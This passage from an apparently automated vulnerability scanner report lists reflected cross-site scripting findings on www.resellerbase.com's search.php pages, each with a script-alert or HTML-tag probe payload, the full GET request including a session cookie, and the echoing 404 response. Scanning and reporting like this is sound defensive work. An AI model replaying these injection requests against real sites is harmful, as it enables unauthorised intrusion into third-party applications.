<p>The requested URL /detail/20d9eeb<script>alert(1)</script>2a1d6e2596f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1713. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69ab6<script>alert(1)</script>fa5f29d0c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes69ab6<script>alert(1)</script>fa5f29d0c/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes69ab6<script>alert(1)</script>fa5f29d0c/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1714. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bcba1<script>alert(1)</script>b53cc99000f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmosbcba1<script>alert(1)</script>b53cc99000f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmosbcba1<script>alert(1)</script>b53cc99000f/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1715. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ca402<script>alert(1)</script>1aa72683a59 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/imagesca402<script>alert(1)</script>1aa72683a59/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/imagesca402<script>alert(1)</script>1aa72683a59/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1716. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cc06c<script>alert(1)</script>578e584fd05 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/search.phpcc06c<script>alert(1)</script>578e584fd05?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.phpcc06c<script>alert(1)</script>578e584fd05?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1717. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d77b2<a>7549e59f96c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd77b2<a>7549e59f96c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd77b2<a>7549e59f96c&opt=2 was not found on this server.</p>
...[SNIP]...

2.1718. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f9cbe<a>37e64226ccd was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...f9cbe<a>37e64226ccd&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...f9cbe<a>37e64226ccd&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1719. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cb1c<script>alert(1)</script>8c54d90f3f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4cb1c<script>alert(1)</script>8c54d90f3f3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4cb1c<script>alert(1)</script>8c54d90f3f3=1 was not found on this server.</p>
...[SNIP]...

2.1720. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bcaf6<a>da880dd1acc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bcaf6<a>da880dd1acc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bcaf6<a>da880dd1acc was not found on this server.</p>
...[SNIP]...

2.1721. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dde6a<script>alert(1)</script>99438442622 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildde6a<script>alert(1)</script>99438442622/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildde6a<script>alert(1)</script>99438442622/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1722. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a7540<script>alert(1)</script>63e945e0fe3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20a7540<script>alert(1)</script>63e945e0fe3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20a7540<script>alert(1)</script>63e945e0fe3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1723. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e33c<script>alert(1)</script>4cca52b1ff3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes1e33c<script>alert(1)</script>4cca52b1ff3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes1e33c<script>alert(1)</script>4cca52b1ff3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1724. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f270<script>alert(1)</script>bf31f733122 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos6f270<script>alert(1)</script>bf31f733122/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos6f270<script>alert(1)</script>bf31f733122/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1725. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22860<script>alert(1)</script>985e9a4ae8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/search.php22860<script>alert(1)</script>985e9a4ae8e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php22860<script>alert(1)</script>985e9a4ae8e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1726. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e7a94<a>90ccc4c7f6e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Searche7a94<a>90ccc4c7f6e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Searche7a94<a>90ccc4c7f6e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1727. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 13ccc<a>6cb50fb4924 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...13ccc<a>6cb50fb4924&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...13ccc<a>6cb50fb4924&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1728. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c9638<script>alert(1)</script>6b69078ba8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c9638<script>alert(1)</script>6b69078ba8e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c9638<script>alert(1)</script>6b69078ba8e=1 was not found on this server.</p>
...[SNIP]...

2.1729. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5ffc3<a>7a961ae56db was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25ffc3<a>7a961ae56db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25ffc3<a>7a961ae56db was not found on this server.</p>
...[SNIP]...

2.1730. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a298<script>alert(1)</script>aac68c348d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1a298<script>alert(1)</script>aac68c348d/20/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
